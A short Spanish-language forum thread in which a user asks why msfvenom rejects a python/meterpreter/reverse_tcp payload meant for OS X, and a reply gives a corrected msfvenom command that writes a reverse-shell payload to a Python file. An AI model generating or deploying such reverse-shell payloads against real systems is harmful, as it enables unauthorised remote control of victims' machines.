He usado metasploit en mj kali para crear un exploit para os x mediante "msfven -p python/meterpreter/reverse_tcp LHOST=(miip) LPORT=4444 R >prueba.py"
Y me dice que el payload que he seleccionado es invalido.
Alguien podría ayudarme?
Muchas gracias.
$ msfvenom -p python/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 > payload.py
Lo siento, habia escrito mal "msfvenom " en el foro ( en el comando lo escribí bien). Voy a probar como indicas sin la "R" haber que me dice. Gracies por la informacion.
Saludos